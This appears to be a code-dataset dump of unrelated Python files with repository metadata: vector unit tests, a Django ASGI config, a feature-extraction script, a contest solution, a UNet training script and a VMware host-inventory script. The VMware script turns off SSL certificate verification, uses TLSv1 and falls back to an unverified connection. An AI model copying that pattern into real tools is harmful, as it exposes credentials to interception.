with self.assertRaises(TypeError):
v(x=1)
with self.assertRaises(TypeError):
v(1, z=3)
def test_eq(self):
self.assertEqual(vector([1,2]), vector([1,2]))
self.assertEqual(vector([1,2]), (1,2))
self.assertTrue(vector([1,2]) == (1,2))
self.assertFalse(vector([1,2]) == [1,2])
def test_req(self):
self.assertEqual((1,2), vector([1,2]))
self.assertTrue((1,2) == vector([1,2]))
self.assertFalse([1,2] == vector([1,2]))
def test_pos(self):
self.assertEqual(+vector([1,2]), vector([1,2]))
def test_neg(self):
self.assertEqual(-vector([1,2]), vector([-1,-2]))
def test_add(self):
self.assertEqual(vector([1,2]) + vector([3,4]), (4,6))
self.assertEqual(vector([1,2,3]) + vector([4,5,6]), (5,7,9))
self.assertEqual(vector([1,0]) + (0,-1), (1, -1))
with self.assertRaises(TypeError):
vector([0,-1]) + 1
def test_radd(self):
self.assertEqual((1,2) + vector([3,4]), vector([4, 6]))
self.assertEqual([1,2,3] + vector([4,5,6]), vector([5,7,9]))
with self.assertRaises(TypeError):
1 + vector([0,-1])
def test_iadd(self):
x = vector([1,2])
x += vector([3,4])
self.assertEqual(x, vector([4,6]))
x = vector([1,2])
x += (3,4)
self.assertEqual(x, vector([4,6]))
with self.assertRaises(TypeError):
x = vector([0,-1])
x += 1
def test_sub(self):
self.assertEqual(vector([1,2]) - vector([3,4]), (-2, -2))
self.assertEqual(vector([4,5,6]) - vector([1,2,3]), (3, 3, 3))
self.assertEqual(vector([1,0]) - (0,-1), (1, 1))
def test_rsub(self):
self.assertEqual((1,2) - vector([3,4]), vector([-2, -2]))
self.assertEqual([4,5,6] - vector([1,2,3]), vector([3, 3, 3]))
with self.assertRaises(TypeError):
1 - vector([0,-1])
def test_isub(self):
x = vector([1,2])
x -= vector([3,4])
self.assertEqual(x, vector([-2, -2]))
x = vector([4,5,6])
x -= (1,2,3)
self.assertEqual(x, (3, 3, 3))
with self.assertRaises(TypeError):
x = vector([0,-1])
x -= 1
def test_mul(self):
self.assertEqual(vector([1,2]) * 2, vector([2, 4]))
self.assertEqual(vector([4,5,6]) * 2, vector([8, 10, 12]))
self.assertEqual(vector([1,2]) * (3,4), 1*3 + 2*4)
with self.assertRaises(ValueError):
vector([1,2]) * vector([3,4,5])
with self.assertRaises(ValueError):
vector([1,2,3]) * vector([4,5])
def test_rmul(self):
self.assertEqual(2 * vector([1,2]), vector([2, 4]))
self.assertEqual(2 * vector([4,5,6]), vector([8, 10, 12]))
self.assertEqual((3,4) * vector([1,2]), 3*1 + 4*2)
with self.assertRaises(ValueError):
vector([1,2]) * vector([3,4,5])
with self.assertRaises(ValueError):
vector([1,2,3]) * vector([4,5])
def test_repr(self):
self.assertEqual(repr(vector()), "v()")
self.assertEqual(repr(vector([1, 0, -1])), "v(1, 0, -1)")
def test_str(self):
self.assertEqual(str(vector()), "<>")
self.assertEqual(str(vector([1, 0, -1])), "<1, 0, -1>")
| [
"viralidealogue@gmail.com"
] | viralidealogue@gmail.com |
cf8025a4a33af69722465da60102609dcbda82a2 | 73c7aceeccc9b4c095dd8e23d376b6449571ad56 | /banaublog/asgi.py | 4078b26f12e23f6382d805a9098c65c9185086b2 | [] | no_license | scottstot154/Banau-blog | 0efbbebae5ca7ddfbcba7d359ced17b5cad426bb | bcbe0e27dde4589699eacf6ec5fa81ca484f0e4b | refs/heads/main | 2023-07-13T20:25:14.966037 | 2021-08-24T21:11:16 | 2021-08-24T21:11:16 | 399,599,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | """
ASGI config for banaublog project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'banaublog.settings')
application = get_asgi_application()
| [
"noreply@github.com"
] | noreply@github.com |
8af8b1154126237b12e676c20db0981a5f9e3d8e | 8a14a7724d00f1eb7791e53f8446e99ecc975605 | /scripts/extract_features.py | 95649f83351e38ae3501cff705bf80339edd1315 | [
"Apache-2.0"
] | permissive | aschn/picolo | 3fa7b26d079fc9687de9c3e1e34cae774bcf8416 | 1f8f50e0709fdaef31bc38045ef9fd0c46aae2b5 | refs/heads/master | 2020-04-30T01:37:36.587287 | 2013-07-19T00:32:05 | 2013-07-19T00:32:05 | 9,307,233 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,229 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author Anna Schneider
@version 0.1
@brief Typical script using picolo to extract features from point particles
"""
import picolo
from shapes import shape_factory_from_values
import argparse
import os.path as path
import time
import csv
# start timer
start = time.time()
# parse command-line arguments
brief = 'Typical script using picolo to extract features from point particles.'
parser = argparse.ArgumentParser(description=brief)
parser.add_argument('filename', type=str, help='path to xy coord file')
parser.add_argument('shape', type=str, help='type of features to extract',
choices=['UnitCell', 'Fourier', 'Zernike'])
parser.add_argument('dist', type=float, help='distance cutoff to neighbors')
parser.add_argument('--train', action='store_true',
help='include flag to only get features for prespecified training rows')
args = parser.parse_args()
# set up file paths
rootname, ext = path.splitext(args.filename)
dirname = path.dirname(args.filename)
# set up matcher
matcher = picolo.Matcher(args.filename, delim=' ', name=rootname,
trainingcol=2)
# create and add default shape of correct type
shape = shape_factory_from_values(args.shape,
optdata={'neighbor_dist': args.dist,
'max_dist': args.dist})
matcher.shapes.add('test', shape)
# get ndarray of features and particle ids by comparing to 'test' shape
features = matcher.feature_matrix('test')
# open csv writer
outfile = '%s_%s_features.dat' % (rootname, args.shape)
writer = csv.writer(open(outfile, 'w'), delimiter=' ')
# write header
writer.writerow(['id'] + shape.get_components())
# loop over particle ids
if args.train:
inds = matcher.training_ids
else:
inds = range(matcher.config.N)
for ip in inds:
# only write features for particles with valid shapes
if matcher.get_features('test', ip).get('is_valid'):
# write row of features
writer.writerow([ip] + ['%0.4f' % x for x in features[ip]])
# end timer
end = time.time()
print 'Done with %s ... took %d seconds.' % (rootname, end-start)
| [
"annarschneider@gmail.com"
] | annarschneider@gmail.com |
1eadf13b44ed3ecced195ac1f6974c5866be1f8b | 37efda4646f478b66674e384e1bc139e7874d972 | /practice/RaodtoMillionaire.py | 7677b54444573abaec9ffa4c8c2fa22f69a24b2b | [] | no_license | siberian122/kyoupuro | 02c1c40f7c09ff0c07a1d50b727f860ad269d8b1 | 8bf5e5b354d82f44f54c80f1fc014c9519de3ca4 | refs/heads/master | 2023-04-04T02:45:29.445107 | 2021-04-20T07:37:47 | 2021-04-20T07:37:47 | 299,248,378 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | n = int(input())
a = list(map(int, input().split()))
b = []
for i in range(n-1):
num = a[i]-a[i+1]
b.append(num)
now = 1000
stock = 0
for i in range(n-1):
if b[i] > 0: # 売る
now += stock*a[i]
stock = 0
elif now > 0 and b[i] < 0: # 買う
stock += now//a[i]
now = now % a[i]
#print(now, stock)
now += a[-1]*stock
print(now)
| [
"siberian1000@gmail.com"
] | siberian1000@gmail.com |
d4a6b27bf60dc1ceb584a5edc8a74f007225d63e | 6bac66f8ac3d41364a4400c038249cfbf7a1475f | /Code/model_mobilenetv2_unet.py | c94142b86d6b49134b4d7de9f04297d2cfe81f0b | [] | no_license | Tejaswi-dev/Image_Colorization | 05aeb846ab15d3785437d1c69108890d06c73324 | 3721b29a3e39023634a3dcc6eaf2aae7df4b2913 | refs/heads/master | 2022-05-24T13:30:58.408217 | 2020-04-28T15:43:40 | 2020-04-28T15:43:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,330 | py | # %% --------------------------------------- Imports -------------------------------------------------------------------
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from tensorflow.keras.layers import *
from tensorflow.keras.models import Model
from tensorflow.keras.applications.vgg16 import *
from sklearn.model_selection import train_test_split
import math
from tensorflow.python.keras.utils import losses_utils
import segmentation_models as sm
sm.set_framework('tf.keras')
print(sm.__version__)
# %% --------------------------------------- Set-Up --------------------------------------------------------------------
tf.config.experimental.list_physical_devices('GPU')
tf.random.set_seed(42)
np.random.seed(42)
# %% ----------------------------------- Hyper Parameters and Constants ------------------------------------------------
IMG_SIZE = [224, 224]
N_CHANNELS = 3
N_CLASSES = 169
DIR_BASE = '/home/ubuntu/capstone/train_test/'
PRED_DIR = '/home/ubuntu/capstone//prediction/'
VALID_SIZE = 0.1765
BATCH_SIZE = 8
NUM_EPOCHS = 10
# %% -------------------------------------- Data Prep ------------------------------------------------------------------
x_train = np.load(file=DIR_BASE + "x_train.npy", allow_pickle=True)
y_train = np.load(file=DIR_BASE + "y_train.npy", allow_pickle=True)
x_test = np.load(file=DIR_BASE + "x_test.npy", allow_pickle=True)
y_test = np.load(file=DIR_BASE + "y_test.npy", allow_pickle=True)
x_true = np.load(file=PRED_DIR + "x_true.npy", allow_pickle=True)
x_train, x_valid, y_train, y_valid = train_test_split(x_train, y_train, test_size=VALID_SIZE)
class CustomDataGenerator(tf.keras.utils.Sequence):
def __init__(self, x_set, y_set, batch_size, num_classes=N_CLASSES):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
self.n_classes = num_classes
def __len__(self):
return math.ceil(len(self.x) / self.batch_size)
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) *
self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) *
self.batch_size]
batch_y = tf.keras.utils.to_categorical(y=batch_y,
num_classes=N_CLASSES)
return batch_x, batch_y
training_generator = CustomDataGenerator(x_train, y_train, batch_size=BATCH_SIZE)
validation_generator = CustomDataGenerator(x_valid, y_valid, batch_size=BATCH_SIZE)
testing_generator = CustomDataGenerator(x_test, y_test, batch_size=BATCH_SIZE)
# %% -------------------------------------- UNet Model -----------------------------------------------------------------
unet_model = sm.Unet(backbone_name='mobilenetv2', encoder_weights='imagenet',
classes=169, input_shape=(224, 224, 3), activation='softmax')
unet_model.summary()
# %% -------------------------------------- Training Prep ----------------------------------------------------------
def dice_loss(y_true, y_pred, eps=1e-6, spatial_axes=[1, 2], from_logits=False):
num_classes = y_pred.shape[-1]
# Transform logits in probabilities, and one-hot the ground-truth:
# Compute Dice numerator and denominator:
num_perclass = 2 * tf.math.reduce_sum(y_pred * y_true, axis=spatial_axes)
den_perclass = tf.math.reduce_sum(y_pred + y_true, axis=spatial_axes)
# Compute Dice and average over batch and classes:
dice = tf.math.reduce_mean((num_perclass + eps) / (den_perclass + eps))
return 1 - dice
class DiceLoss(tf.keras.losses.Loss):
def __init__(self, eps=1e-6, spatial_axes=[1, 2], from_logits=False, name='loss'):
super(DiceLoss, self).__init__(reduction=losses_utils.ReductionV2.AUTO, name=name)
self.eps = eps
self.spatial_axes = spatial_axes
self.from_logits = from_logits
def call(self, y_true, y_pred, sample_weight=None):
return dice_loss(y_true, y_pred, eps=self.eps,
spatial_axes=self.spatial_axes, from_logits=self.from_logits)
accuracy = tf.metrics.Accuracy(name='acc')
meanIoU = tf.metrics.MeanIoU(num_classes=N_CLASSES, name='mIoU')
loss_c = tf.keras.losses.CategoricalCrossentropy()
loss_d = DiceLoss()
optimizer = tf.keras.optimizers.Adam()
# %% -------------------------------------- Training -------------------------------------------------------------------
unet_model.compile(optimizer=optimizer, loss=loss_d, metrics=[meanIoU])
history = unet_model.fit(x=training_generator,
validation_data=validation_generator,
epochs=NUM_EPOCHS)
# %% -------------------------------------- Testing --------------------------------------------------------------------
history_test = unet_model.evaluate(x=testing_generator)
print(history_test)
# %% -------------------------------------- Prediction -----------------------------------------------------------------
x_true = np.load(file=PRED_DIR + "x_true.npy", allow_pickle=True)
def predict(images, model):
x_true = images
y_pred = np.argmax(model.predict(x_true), axis=-1)
return x_true, y_pred
x_pred, y_pred = predict(x_true, unet_model)
np.save(PRED_DIR + "x_pred.npy", x_true)
np.save(PRED_DIR + "y_pred.npy", y_pred)
| [
"kanchan.ghimire92@gmail.com"
] | kanchan.ghimire92@gmail.com |
195fc4a1ecc35a5591a35a938af3d1b72bb25692 | a8597579e18b54d2a98c89c10326d3287c2a4603 | /connect_scratch_hosts.py | 85009d6764ca93cb1464f89db63b43e83db7c01c | [] | no_license | dsmithintx/vmware_host_info | 3744a7fef17b6f4093351b169eb82cc3f56343e0 | 0a0c0704d7ecd79074515e2280b156a75f84ebab | refs/heads/main | 2023-03-03T23:05:19.526021 | 2021-02-12T17:22:36 | 2021-02-12T17:22:36 | 338,383,084 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,177 | py | from pyVim.connect import SmartConnect, Disconnect, GetSi, SmartConnectNoSSL
from pyVmomi import vmodl
from pyVmomi import vim
import atexit
import requests
import ssl
# Disabling urllib3 ssl warnings
requests.packages.urllib3.disable_warnings()
# Disabling SSL certificate verification
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_NONE
user = "user_name"
password = "passwd"
vcenter = "vcenter_name"
port = 443
# connect to vCenter
try:
si = SmartConnect(host=vcenter, user=user, pwd=password, port=port)
print('Good to go')
except:
si = SmartConnectNoSSL(host=vcenter, user=user, pwd=password, port=port)
print('Using NoSSL Connection...')
# Disconnect when completed
atexit.register(Disconnect, si)
content = si.RetrieveContent()
##### View Types as a dictionary i.e. Get-View types, HostSystem, VirtualMachine, etc.
vim_types = {'datacenter': [vim.Datacenter],
'dvs_name': [vim.dvs.VmwareDistributedVirtualSwitch],
'datastore_name': [vim.Datastore],
'resourcepool': [vim.ResourcePool],
'host': [vim.HostSystem],
'cluster': [vim.ClusterComputeResource],
'vm': [vim.VirtualMachine],
'dportgroup': [vim.DistributedVirtualPortgroup],
'portgroup': [vim.Network]}
##### View Types i.e. Get-View types, HostSystem, VirtualMachine, etc.
Datacenter = [vim.Datacenter] # Datacenter
VirtualMachine = [vim.VirtualMachine] # VirtualMachine
HostSystem = [vim.HostSystem] # HostSystem
# ClusterComputeResource [vim.ClusterComputeResource]
ClusterComputeResource = [vim.ComputeResource]
Datastore = [vim.Datastore] # Datastore
Network = [vim.Network] # Network
# DistributedVirtualPortgroup
DvPG = [vim.DistributedVirtualPortgroup]
Folder = [vim.Folder] # Folder
name = 'esx_host_name'
# Host objects
print("Collecting host objects...")
host_systems = content.viewManager.CreateContainerView(
content.rootFolder, HostSystem, True) # Get-View -ViewType HostSystem
hostView = host_systems.view
print("Stop")
def print_host_info(host):
config = host.config
hardware = host.hardware
runtime = host.runtime
summary = host.summary
for i in summary.hardware.otherIdentifyingInfo:
if isinstance(i, vim.host.SystemIdentificationInfo):
serial_number = i.identifierValue
# summary.config.name
print(f"Name : {host.name}")
print(f"Manufacture : {hardware.systemInfo.vendor}")
print(f"Model : {hardware.systemInfo.model}")
print(f"Serial Number : {serial_number}")
print(f"uuid : {hardware.systemInfo.uuid}")
print(f"Cpu Sockets : {hardware.cpuInfo.numCpuPackages}")
print(f"Number of Cores : {hardware.cpuInfo.numCpuCores}")
print(f"Mem Size : {hardware.memorySize}")
print(f"Bios Version : {hardware.biosInfo.biosVersion}")
print(f"Bios Release : {hardware.biosInfo.releaseDate}")
print(f"ESXi Version : {summary.config.product.version}")
print(f"ESXi Build : {summary.config.product.build}")
print(f"ESXi API Version : {summary.config.product.apiVersion}")
print(f"Product Full Name : {summary.config.product.fullName}")
print(f"License Product Name : {summary.config.product.licenseProductName}")
print(f"License Product Version : {summary.config.product.licenseProductVersion}")
print(f"Product Vendor : {summary.config.product.vendor}")
print(f"Boot Time : {summary.runtime.bootTime}")
print(f"Overall Status : {summary.overallStatus}")
print(f"Connection State : {runtime.connectionState}")
print(f"Maintenance Mode : {runtime.inMaintenanceMode}")
print(f"Power State : {runtime.powerState}")
print(f"Standby Mode : {runtime.standbyMode}")
print(f"vMotion IP : {config.vmotion.ipConfig.ipAddress}")
print(f"vMotion SubnetMask : {config.vmotion.ipConfig.subnetMask}")
## Find host by Name
for host in host_systems.view:
if name:
if host.name == name:
obj = host
print_host_info(host)
print(host.name)
break
else:
obj = host
break
print("End")
| [
"donnal.smithtx@gmail.com"
] | donnal.smithtx@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.